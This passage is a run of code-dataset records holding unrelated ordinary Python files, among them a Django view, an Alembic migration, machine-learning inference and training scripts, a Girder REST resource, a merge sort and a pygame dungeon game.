childtype_list = []\n\n for item in childtypenames.split('#'):\n item_arr = item.split(':')\n temp_dir = {\n 'name': item_arr[0],\n 'id': item_arr[1]\n }\n\n childtype_list.append(temp_dir)\n\n request_dir = {\n 'foodtypes': foodtypes,\n 'goods': goods,\n 'childtype_list': childtype_list,\n 'childid': childid\n 
}\n    return render(request, 'market/market.html', request_dir)\n\n\ndef cart(request):\n    return render(request, 'cart/cart.html')\n\n\ndef mine(request):\n    return render(request, 'mine/mine.html')\n","sub_path":"mygithub/python1812axf/axf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183482659","text":"\"\"\"empty message\n\nRevision ID: 525b5cdb6d85\nRevises: 9de21e7c6f38\nCreate Date: 2021-11-16 19:19:37.901668\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '525b5cdb6d85'\ndown_revision = '9de21e7c6f38'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_column('rentals', 'due_date')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('rentals', sa.Column('due_date', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/525b5cdb6d85_.py","file_name":"525b5cdb6d85_.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326818245","text":"def setup():\n    size(300, 300)\n    background(255)\n    strokeWeight(3)\n    xo = 40\n    yo = 200\n    leng = int(random(50, 100))\n    i = 0\n    points = []\n    while i < leng:\n        i = i + int(random(13, 20))\n        if i > leng:\n            points.append(leng)\n        else:\n            points.append(i)\n    print(leng)\n    print(points)\n    for pnt in points:\n        # h is the height of the cloud bump at this point; the final point closes the outline\n        if pnt == leng:\n            h = 0\n        else:\n            h = int(random(20, 45))\n        line(xo + pnt - 2, yo - h, xo + pnt + 2, yo - h)\n    line(xo, yo, xo + 3, yo + 3)\n    line(xo + 3, yo + 3, xo + leng - 3, yo + 3)\n    line(xo + leng - 3, yo + 3, xo + leng, yo)\n","sub_path":"dino_game/nube.pyde","file_name":"nube.pyde","file_ext":"pyde","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"407867313","text":"import numpy as np\nimport json\n\nclass ColorMapper():\n    def __init__(self, path_to_colormap_file, path_to_classmap_file):\n        self.color_dict = self.__load_color_dict(path_to_colormap_file, path_to_classmap_file)\n\n    def __load_color_dict(self, path_to_colormap_file, path_to_classmap_file):\n        # Get name -> color relation\n        colormap = None\n        with open(path_to_colormap_file) as file:\n            json_array = json.load(file)\n            colormap = json_array[\"ColorMapping\"]\n        # Get name -> class relation\n        classmap = None\n        with open(path_to_classmap_file) as file:\n            json_array = json.load(file)\n            classmap = json_array[\"ClassMapping\"]\n        # Generate class -> color\n        color_dict = {}\n        for key in colormap:\n            color_dict[classmap[key]] = colormap[key]\n        return color_dict\n\n    def segmentation_to_color(self, segmentation_prediction):\n        for key in self.color_dict:\n            segmentation_prediction[segmentation_prediction==key] = self.color_dict[key]\n        return segmentation_prediction","sub_path":"lib/Utility/segmentation_remap.py","file_name":"segmentation_remap.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
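A minimal usage sketch for the ColorMapper record above. The mapping-file contents, class ids, and color values here are illustrative assumptions, not part of the original file; scalar single-channel colors are used so the boolean-mask assignment broadcasts, and the colors are chosen outside the class-id range so the sequential in-place replacement cannot remap a pixel twice.

import json
import numpy as np
from tempfile import NamedTemporaryFile

# Hypothetical mapping files: ColorMapping maps name -> color, ClassMapping maps name -> class id.
with NamedTemporaryFile('w', suffix='.json', delete=False) as f_color:
    json.dump({'ColorMapping': {'road': 100, 'car': 200}}, f_color)
with NamedTemporaryFile('w', suffix='.json', delete=False) as f_class:
    json.dump({'ClassMapping': {'road': 0, 'car': 1}}, f_class)

mapper = ColorMapper(f_color.name, f_class.name)  # assumes the ColorMapper class above is in scope
prediction = np.array([[0, 1],
                       [1, 0]])
print(mapper.segmentation_to_color(prediction))
# [[100 200]
#  [200 100]]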
+{"seq_id":"586210057","text":"outfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"w\")\r\noutfile.write(\"fame\")\r\noutfile.close()\r\n\r\ninfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"a\")\r\ninfile.write(\"\\nfriday\\nframe\\nfast\\nfall\\nfuture\\nall we are challengers\")\r\ninfile.close()\r\n\r\ninfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"r\")\r\nfor line in infile:\r\n line=line.rstrip()\r\n word_list=line.split()\r\n for word in word_list:\r\n print(word)\r\ninfile.close()\r\n","sub_path":"파일연습.py","file_name":"파일연습.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525163729","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport datetime\nimport logging\nimport time\nimport os\n\nimport torch\nfrom tqdm import tqdm\n\nfrom maskrcnn_benchmark.data.datasets.evaluation import evaluate\nfrom ..utils.comm import is_main_process, get_world_size\nfrom ..utils.comm import all_gather\nfrom ..utils.comm import synchronize\n\ncoco2cityscapes_map = { 1: 1,# person\n 2: 4, # bicycle\n 3: 2, # car\n 4: 5, # motorcycle\n 6: 6, #bus\n 7: 7,# train\n 8: 8,#truck\"\n } \n\ndef coco2cityscapes_label(predictions):\n ''' \n convert coco class label to cityscapes label.\n Arguments:\n predictions: a BoxList object.\n Return\n predictions: a BoxList object with labels converted.\n '''\n # print('Warning: converting coco model prediction to cityscapes!')\n idx_to_keep = []\n for i in range(len(predictions.extra_fields['labels'])):\n try:\n predictions.extra_fields['labels'][i] = coco2cityscapes_map[int(predictions.extra_fields['labels'][i])]\n idx_to_keep.append(i)\n except:\n '''remove this class since doesnt in Cityscapes'''\n continue\n\n predictions.bbox = predictions.bbox[idx_to_keep]\n # print('predictions.extra_fields: ', predictions.extra_fields.keys())\n predictions.extra_fields['scores'] = predictions.extra_fields['scores'][idx_to_keep]\n predictions.extra_fields['mask'] = predictions.extra_fields['mask'][idx_to_keep]\n predictions.extra_fields['labels'] = predictions.extra_fields['labels'][idx_to_keep]\n return predictions\n\n\ndef compute_on_dataset(model, data_loader, device, convert_pred_coco2cityscapes=False):\n model.eval()\n results_dict = {}\n cpu_device = torch.device(\"cpu\")\n for i, batch in enumerate(tqdm(data_loader)):\n images, targets, image_ids = batch\n images = images.to(device)\n with torch.no_grad():\n output = model(images)\n tmp = []\n for j, o in enumerate(output):\n o = o.to(cpu_device)\n if convert_pred_coco2cityscapes:\n o = coco2cityscapes_label(o)\n output[j] = o\n results_dict.update(\n {img_id: result for img_id, result in zip(image_ids, output)}\n )\n return results_dict\n\n\ndef _accumulate_predictions_from_multiple_gpus(predictions_per_gpu):\n all_predictions = all_gather(predictions_per_gpu)\n if not is_main_process():\n return\n # merge the list of dicts\n predictions = {}\n for p in all_predictions:\n predictions.update(p)\n # convert a dict where the key is the index in a list\n image_ids = list(sorted(predictions.keys()))\n if len(image_ids) != image_ids[-1] + 1:\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n logger.warning(\n \"Number of images that were gathered from multiple processes is not \"\n \"a contiguous set. 
Some images might be missing from the evaluation\"\n )\n\n # convert to a list\n predictions = [predictions[i] for i in image_ids]\n return predictions\n\n\ndef inference(\n model,\n data_loader,\n dataset_name,\n iou_types=(\"bbox\",),\n box_only=False,\n device=\"cuda\",\n expected_results=(),\n expected_results_sigma_tol=4,\n output_folder=None,\n convert_pred_coco2cityscapes=False,\n):\n # convert to a torch.device for efficiency\n device = torch.device(device)\n num_devices = get_world_size()\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n dataset = data_loader.dataset\n logger.info(\"Start evaluation on {} dataset({} images).\".format(dataset_name, len(dataset)))\n start_time = time.time()\n predictions = compute_on_dataset(model, data_loader, device, convert_pred_coco2cityscapes)\n\n # if convert_pred_coco2cityscapes:\n # '''Only convert it when testing COCO trained model on Cityscpaes dataset'''\n # print('Warning: converting coco model prediction to cityscapes!')\n # predictions = coco2cityscapes_label(predictions)\n\n # wait for all processes to complete before measuring the time\n synchronize()\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=total_time))\n logger.info(\n \"Total inference time: {} ({} s / img per device, on {} devices)\".format(\n total_time_str, total_time * num_devices / len(dataset), num_devices\n )\n )\n\n predictions = _accumulate_predictions_from_multiple_gpus(predictions)\n if not is_main_process():\n return\n\n if output_folder:\n torch.save(predictions, os.path.join(output_folder, \"predictions.pth\"))\n\n extra_args = dict(\n box_only=box_only,\n iou_types=iou_types,\n expected_results=expected_results,\n expected_results_sigma_tol=expected_results_sigma_tol,\n )\n\n return evaluate(dataset=dataset,\n predictions=predictions,\n output_folder=output_folder,\n **extra_args)\n","sub_path":"maskrcnn_benchmark/engine/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19950418","text":"import os\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport numpy as np\nimport tensorflow as tf\ntf.get_logger().setLevel('ERROR')\n\nfrom dante_by_rev_syl.data_preparation import build_vocab_verse, build_dataset_verse, split_dataset\nfrom dante_by_rev_syl.text_processing import clean_comedy, prettify_text, special_tokens\nfrom dante_by_rev_syl.dante_model import build_model\nfrom dante_by_rev_syl.training_dante import train_model\nfrom utils import save_vocab, load_vocab\n\n\nworking_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'dante_by_rev_syl')\n\ndivine_comedy_file = os.path.join(os.path.dirname(working_dir), \"divina_commedia\", \"divina_commedia_accent_UTF-8.txt\") \n\n\nwith open(divine_comedy_file,\"r\") as f:\n divine_comedy = f.read()\n\ndivine_comedy = clean_comedy(divine_comedy, special_tokens)\n\n\n##############################\n# Training's hyper-parameters\n\n## VERSION 1\n\nBATCH_SIZE = 32\nEPOCHS = 200\nSEQ_LENGTH = 100\nEMBEDDING_DIM = 256\nRNN_UNITS = 1024\nRNN_TYPE = 'lstm'\n\n## VERSION 2\n\n# BATCH_SIZE = 32\n# EPOCHS = 200\n# SEQ_LENGTH = 25\n# EMBEDDING_DIM = 256\n# RNN_UNITS = 1024\n# RNN_TYPE = 'lstm'\n\n## VERSION 3\n\n# BATCH_SIZE = 32\n# EPOCHS = 200\n# SEQ_LENGTH = 50\n# EMBEDDING_DIM = 256\n# RNN_UNITS = 1024\n# RNN_TYPE = 
'lstm'\n\n##############################\n\nvocab_verse, idx2syl_verse, syl2idx_verse = build_vocab_verse(divine_comedy)\n\ndataset_verse = build_dataset_verse(divine_comedy, vocab_verse, idx2syl_verse, syl2idx_verse, seq_length=SEQ_LENGTH)\n\n\n# Path where the vocab will be saved\nlogs_dir = os.path.join(working_dir, 'logs')\nos.makedirs(logs_dir, exist_ok = True) \nvocab_file_verse = os.path.join(logs_dir, 'vocab_verse.json')\n\nsave_vocab(vocab_verse, idx2syl_verse, syl2idx_verse, vocab_file_verse)\n\ndataset_train_verse, dataset_val_verse = split_dataset(dataset_verse)\n\n\ndataset_train_verse = dataset_train_verse.batch(BATCH_SIZE, drop_remainder=True)\ndataset_val_verse = dataset_val_verse.batch(BATCH_SIZE, drop_remainder=True)\n\n\nmodel_verse = build_model(\n name='VerseNetwork',\n vocab_size = len(vocab_verse),\n seq_length = SEQ_LENGTH,\n embedding_dim=EMBEDDING_DIM,\n rnn_type = RNN_TYPE,\n rnn_units=RNN_UNITS,\n learning_rate=0.01,\n )\n\n\n\nmodel_filename_verse = 'model_by_rev_syl_verse_seq{}_emb{}_{}{}'.format(SEQ_LENGTH, EMBEDDING_DIM, RNN_TYPE, RNN_UNITS)\n\ntrain_model(working_dir, \n model_verse,\n model_filename_verse,\n dataset_train_verse, \n dataset_val_verse, \n epochs=EPOCHS, \n )\n\n\n\n","sub_path":"training_scripts/train_by_rev_syl_verse.py","file_name":"train_by_rev_syl_verse.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16177782","text":"import cv2\nfrom sklearn.externals import joblib\nimport matplotlib.pyplot as plt\nimport windowing.windower as w\n\nsvc = joblib.load('../../saved_models/svc_rgb_all.pkl')\nx_scaler = joblib.load('../../saved_models/x_scaler_rgb_all.pkl')\nfile_name = 'test5.jpg'\nbgr_image = cv2.imread(filename='../../test_images/' + file_name)\nrgb_image = cv2.cvtColor(src=bgr_image, code=cv2.COLOR_BGR2RGB)\n\nsmall_windows = w.slide_window(img=rgb_image, xy_window=[64, 64], y_start_stop=[400, 464], xy_overlap=[0.5, 0.5])\nmedium_windows = w.slide_window(img=rgb_image, xy_window=[96, 96], y_start_stop=[400, 592], xy_overlap=[0.75, 0.75])\nlarge_windows = w.slide_window(img=rgb_image, xy_window=[128, 128], y_start_stop=[400, 650], xy_overlap=[0.75, 0.75])\n\ntriggered_windows_small = w.search_windows(img=rgb_image, windows=small_windows, classifier=svc, scaler=x_scaler)\ntriggered_windows_medium = w.search_windows(img=rgb_image, windows=medium_windows, classifier=svc, scaler=x_scaler)\ntriggered_windows_large = w.search_windows(img=rgb_image, windows=large_windows, classifier=svc, scaler=x_scaler)\n\nprint(len(triggered_windows_small))\nprint(len(triggered_windows_medium))\nprint(len(triggered_windows_large))\n\n\nwindow_img = w.draw_boxes(img=rgb_image, bboxes=triggered_windows_small, color=(0, 255, 0), thick=6)\nwindow_img = w.draw_boxes(img=window_img, bboxes=triggered_windows_medium, color=(0, 64, 255), thick=6)\nwindow_img = w.draw_boxes(img=window_img, bboxes=triggered_windows_large, color=(255, 255, 0), thick=6)\n\nplt.title(\"Large (Yellow) and Medium (Blue) windows triggering (No filtering) - \" + file_name, fontsize=20)\n# plt.title(\"Medium (Blue) and Small (Green) windows triggering (No filtering) - \" + file_name, fontsize=20)\nplt.imshow(window_img)\nplt.show()\n","sub_path":"windowing/tests/windower_test.py","file_name":"windower_test.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"89448851","text":"# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Sun Sep 29 00:23:47 2019\n\n@author: morri\n\"\"\"\n\ndef getDocTFIDF(docTF,IDF):\n docTFIDF={}\n for doc in docTF:\n docTFIDF[doc]=docTF[doc]*IDF\n return docTFIDF;\n\ndef getQueryTFIDF(queryTF,IDF):\n queryTFIDF={}\n for doc in queryTF:\n queryTFIDF[doc]=queryTF[doc]*IDF\n return queryTFIDF;","sub_path":"HW3/calculateTFIDF.py","file_name":"calculateTFIDF.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439087206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom girder.api.rest import Resource, RestException\nfrom girder.api.rest import filtermodel, loadmodel\nfrom girder.constants import AccessType\nfrom girder.api import access\nfrom girder.api.describe import Description, describeRoute\nimport json\n\n\nclass Session(Resource):\n def initialize(self):\n self.name = 'session'\n self.exposeFields(level=AccessType.READ, fields={'_id', 'dataSet', 'ownerId'})\n\n def validate(self, session):\n return session\n\n @access.user\n @filtermodel(model='session', plugin='wt_data_manager')\n @describeRoute(\n Description('List sessions for a given user.')\n )\n def listSessions(self, params):\n user = self.getCurrentUser()\n return list(self.model('session', 'wt_data_manager').list(user=user))\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Get a session by ID.')\n .param('id', 'The ID of the session.', paramType='path')\n .param('loadObjects', 'If specified, the dataSet of the returned session will contain'\n 'two additional fields for each entry: \"type\": \"folder\"|\"item\" '\n 'and \"obj\": ', paramType='query')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n )\n @filtermodel(model='session', plugin='wt_data_manager')\n def getSession(self, session, params):\n if 'loadObjects' in params:\n self.model('session', 'wt_data_manager').loadObjects(session['dataSet'])\n return session\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.WRITE)\n @describeRoute(\n Description('Removes an existing session.')\n .param('id', 'The ID of the session.', paramType='path')\n .errorResponse('ID was invalid.')\n .errorResponse('Access was denied for the session.', 403)\n )\n def removeSession(self, session, params):\n user = self.getCurrentUser()\n return self.model('session', 'wt_data_manager').deleteSession(user, session)\n\n @access.user\n @describeRoute(\n Description('Creates a session.')\n .param('dataSet', 'An optional data set to initialize the session with. 
'\n 'A data set is a list of objects of the form '\n '{\"itemId\": string, \"mountPath\": string}.', paramType='query')\n )\n def createSession(self, params):\n user = self.getCurrentUser()\n dataSet = json.loads(params.get('dataSet', '[]'))\n return self.model('session', 'wt_data_manager').createSession(user, dataSet)\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Get an object in a session using a path.')\n .param('id', 'The ID of the session.', paramType='path')\n .param('path', 'The path of the object, starting from the mount point.', paramType='query')\n .param('children', 'Whether to also return a listing of all the children '\n 'of the object at the specified path', paramType='query')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n .errorResponse('Object was not found.', 401)\n )\n def getObject(self, session, params):\n user = self.getCurrentUser()\n children = False\n if 'children' in params:\n children = True\n try:\n return self.model('session', 'wt_data_manager').getObject(user, session,\n params['path'], children)\n except LookupError as ex:\n raise RestException(ex.message, code=401)\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Returns an unfiltered item in this session')\n .param('id', 'The ID of the session.', paramType='path')\n .param('itemId', 'The ID of the item.', paramType='path')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n .errorResponse('Object was not found.', 401)\n )\n def getItemUnfiltered(self, session, itemId, params):\n user = self.getCurrentUser()\n self.model('session', 'wt_data_manager').checkOwnership(user, session)\n item = self.model('item').load(itemId, level=AccessType.READ, user=user)\n return item\n","sub_path":"server/resources/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281321168","text":"def merge_sort(nums):\n\n if len(nums) <= 64:\n for i in range(len(nums)):\n j = i\n while j > 0 and nums[j] < nums[j-1]:\n nums[j], nums[j - 1] = nums[j-1], nums[j]\n j = j -1\n\n return\n\n middle_item = len(nums)//2\n\n left_sub = nums[:middle_item]\n right_sub = nums[middle_item:]\n\n merge_sort(left_sub)\n merge_sort(right_sub)\n\n i = 0\n j = 0\n k = 0\n\n while i < len(left_sub) and j < len(right_sub):\n if left_sub[i] < right_sub[j]:\n nums[k] = left_sub[i]\n i = i + 1\n\n else:\n nums[k] = right_sub[j]\n j = j + 1\n\n k = k + 1\n\n\n while i < len(left_sub):\n nums[k] = left_sub[i]\n i = i + 1\n k = k + 1\n\n while j < len(right_sub):\n nums[k] = right_sub[j]\n j = j + 1\n k = k + 1\n\nif __name__ == '__main__':\n my_list = [12,5,18,-76,-74,234,167, 120, 0]\n merge_sort(my_list)\n print(my_list)","sub_path":"Sorting Algorithm/Practice Algorithms/timsort_impl.py","file_name":"timsort_impl.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303382792","text":"import os\nimport random\nimport sys\n\nimport pygame\nimport pygame_gui\nimport pyglet\n\nwindow_size = (640, 480)\n\npygame.init()\nsize = width, height = window_size[0], window_size[1]\nscreen = pygame.display.set_mode(size)\n\n\ndef load_image(name, colorkey=None):\n fullname = 
os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{fullname}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\nall_sprites = pygame.sprite.Group()\ntiles_group = pygame.sprite.Group()\nplayer_group = pygame.sprite.Group()\nboxes_group = pygame.sprite.Group()\nenemies_group = pygame.sprite.Group()\nfireballs_group = pygame.sprite.Group()\ntrap_group = pygame.sprite.Group()\n\nidle = [load_image('idle1.png'), load_image('idle2.png'),\n load_image('idle3.png')]\nrunr = [load_image('runr1.png'), load_image('runr2.png'),\n load_image('runr3.png'), load_image('runr4.png'),\n load_image('runr5.png'), load_image('runr6.png')]\nrunl = [load_image('runl1.png'), load_image('runl2.png'),\n load_image('runl3.png'), load_image('runl4.png'),\n load_image('runl5.png'), load_image('runl6.png')]\nattack_r = [load_image('attackr4.png'),\n load_image('attackr5.png'), load_image('attackr6.png')]\nattack_l = [load_image('attackl4.png'),\n load_image('attackl5.png'), load_image('attackl6.png')]\n\nenemies_images = {'slime': load_image('slime_idle1.png')}\n\nslime_idle = [load_image('slime_idle1.png'), load_image('slime_idle2.png'),\n load_image('slime_idle3.png'), load_image('slime_idle4.png'),\n load_image('slime_idle5.png'), load_image('slime_idle6.png')]\n\ndm_enemies = {'slime': load_image('dm_slime.png')}\n\ntile_images = {\n 'wall_v': load_image('wall_v.png'),\n 'wall_h': load_image('wall.png'),\n 'empty': load_image('floor.png'),\n 'box': load_image('box.png'),\n 'finish': load_image('finish.png'),\n 'trap': load_image('spikes_0.png')\n}\nplayer_image = load_image('idle1.png')\n\ntrap_sprites = [load_image('spikes_0.png'), load_image('spikes_1.png'),\n load_image('spikes_2.png'),\n load_image('spikes_3.png'),\n load_image('spikes_4.png'), load_image('spikes_5.png'),\n load_image('spikes_6.png'),\n load_image('spikes_7.png'), load_image('spikes_8.png'),\n load_image('spikes_9.png')]\n\ntile_width = tile_height = 50\n\nplayer = None\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef start_screen():\n intro_text = [\"Journey of strange man\",\n \"Версия 0.5\",\n \"Правила игры\",\n \"Кничтожте всех монстроов и дойдите до конца уровня\",\n \"Для начала нажмите кнопку\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\nclass Tile(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y, wall_type):\n super().__init__(tiles_group, all_sprites)\n self.image = tile_images[wall_type]\n self.true_x = pos_x * tile_width\n self.true_y = pos_y * tile_height\n self.tile_type = tile_type\n self.w = 50\n self.h = 50\n if wall_type == 'wall_v':\n self.w = 14\n self.rect = self.image.get_rect().move(\n tile_width * pos_x, tile_height * pos_y)\n\n\nclass 
Trap(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n super().__init__(trap_group, all_sprites)\n self.image = pygame.transform.scale(tile_images[tile_type], (50, 50))\n self.true_x = pos_x * tile_width\n self.true_y = pos_y * tile_height\n self.tile_type = tile_type\n self.w = 50\n self.h = 50\n self.texture = 0\n self.text = 1\n self.delay = 0\n self.dm_give = False\n self.pl_stay = False\n self.dmg = 2\n active = False\n self.rect = self.image.get_rect().move(\n tile_width * pos_x, tile_height * pos_y)\n\n def next_texture(self):\n if self.delay == 9:\n self.image = pygame.transform.scale(trap_sprites[self.texture],\n (50, 50))\n self.texture += self.text\n if self.texture == 6:\n sound = pyglet.media.load('data\\sounds\\lv.mp3',\n streaming=False)\n sound.play()\n if self.texture == 10:\n self.texture = 9\n self.text = -1\n if self.texture == 0:\n self.text = 1\n self.delay = 0\n else:\n self.delay += 1\n if self.player_stay_check():\n self.pl_stay = True\n else:\n self.pl_stay = False\n if not self.pl_stay or self.texture < 6:\n self.dm_give = False\n if self.pl_stay and self.texture >= 6 and not self.dm_give:\n player.hp -= self.dmg\n self.dm_give = True\n\n def player_stay_check(self):\n player_pos_x = player.true_x\n player_pos_y = player.true_y\n if player_pos_x >= self.true_x - 25 and player_pos_x + player.w <= self.true_x + 50:\n if player_pos_y >= self.true_y - 25 and player_pos_y + player.h <= self.true_y + 50:\n return True\n else:\n return False\n else:\n return False\n\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n super().__init__(boxes_group, all_sprites)\n self.image = tile_images[tile_type]\n self.true_x = pos_x * 50\n self.true_y = pos_y * 50\n self.w = 25\n self.h = 25\n self.broken = False\n self.tile_type = tile_type\n self.rect = self.image.get_rect().move(50 * pos_x, tile_height * pos_y)\n\n def destroy(self):\n self.image = load_image('br_box.png')\n self.broken = True\n\n\nclass Slime(pygame.sprite.Sprite):\n def __init__(self, enemy_type, pos_x, pos_y):\n super().__init__(enemies_group, all_sprites)\n self.image = enemies_images[enemy_type]\n self.true_x = pos_x * 50\n self.true_y = pos_y * 50\n self.tile_type = None\n self.dmg_delay = 0\n self.enemy_type = enemy_type\n self.rect = self.image.get_rect().move(50 * pos_x, 50 * pos_y)\n self.texture = 0\n self.point_to_move = [0, 0]\n self.target = False\n self.hp = 2\n self.dm = 3\n self.w = 16\n self.h = 15\n self.w_dm = False\n\n def next_texture(self):\n if not self.w_dm:\n self.image = slime_idle[self.texture]\n self.texture += 1\n self.texture %= 6\n else:\n self.image = dm_enemies[self.enemy_type]\n self.w_dm = False\n\n def move(self):\n move_x = 0\n move_y = 0\n if self.point_to_move[0] != 0:\n if self.point_to_move[0] > 0:\n self.rect.x += 3\n move_x = 3\n self.true_x += 3\n self.point_to_move[0] = self.point_to_move[0] - 1\n else:\n self.rect.x -= 3\n move_x = -3\n self.true_x -= 3\n self.point_to_move[0] = self.point_to_move[0] + 1\n if self.point_to_move[1] != 0:\n if self.point_to_move[1] > 0:\n self.rect.y += 3\n move_y = 3\n self.true_y += 3\n self.point_to_move[1] = self.point_to_move[1] - 1\n else:\n self.rect.y -= 3\n move_y = -3\n self.true_y -= 3\n self.point_to_move[1] = self.point_to_move[1] + 1\n self.check_target()\n self.check_dm()\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type == 'wall' or (\n elem.tile_type == 'box' and not elem.broken):\n x2 = elem.true_x - 15\n y2 = elem.true_y - 7\n if 
(x2 < x1 < x2 + elem.w) or (x2 < x1 + 13 < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (y2 < y1 + 13 < y2 + elem.h):\n self.point_to_move = [random.randint(-25, 25),\n random.randint(-25, 25)]\n self.rect.x -= move_x\n self.rect.y -= move_y\n self.true_x -= move_x\n self.true_y -= move_y\n if self.point_to_move[0] == 0 and self.point_to_move[1] == 0:\n self.point_to_move = [random.randint(-25, 25),\n random.randint(-25, 25)]\n\n def check_hp(self):\n if self.hp <= 0:\n self.kill()\n\n def check_target(self):\n px = player.true_x + player.w / 2\n py = player.true_y + player.h / 2\n if abs(self.true_x - px) <= 150 and abs(\n self.true_y - py) <= 150:\n self.target = True\n self.point_to_move[0] = px - self.true_x\n self.point_to_move[1] = py - self.true_y\n\n def check_dm(self):\n px = player.true_x + player.w / 2\n py = player.true_y + player.h / 2\n if self.dmg_delay == 5:\n if abs(self.true_x - px) <= 10 and abs(\n self.true_y - py) <= 10:\n player.hp -= self.dm\n print(player.hp)\n self.dmg_delay = 0\n self.dmg_delay += 1\n\n\nclass Fireball(pygame.sprite.Sprite):\n def __init__(self, x, y, true_x, true_y, nap):\n super().__init__(fireballs_group, all_sprites)\n self.true_x = true_x\n self.true_y = true_y\n self.frames = []\n self.nap = nap\n self.cut_sheet(load_image('fireballls.png'), 10, 1)\n self.texture = 0\n self.w = 10\n self.h = 25\n self.rot = 0\n self.rot = 0\n if nap[0] == 5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 270)\n self.rot = 270\n elif nap[0] == -5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 90)\n self.rot = 90\n elif nap[1] == 5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 180)\n self.rot = 180\n else:\n self.image = self.frames[0]\n self.tile_type = 'fb'\n self.vr = False\n self.rect = self.image.get_rect().move(\n x, y)\n\n def next_texture(self):\n if not self.vr:\n self.image = pygame.transform.rotate(self.frames[self.texture],\n self.rot)\n self.texture += 1\n self.texture %= len(self.frames)\n\n def cut_sheet(self, sheet, columns, rows):\n self.rect = pygame.Rect(0, 0, sheet.get_width() // columns,\n sheet.get_height() // rows)\n for j in range(rows):\n for i in range(columns):\n frame_location = (self.rect.w * i, self.rect.h * j)\n self.frames.append(sheet.subsurface(pygame.Rect(\n frame_location, self.rect.size)))\n\n def move(self):\n self.rect.x -= self.nap[0]\n self.rect.y -= self.nap[1]\n self.true_x -= self.nap[0]\n self.true_y 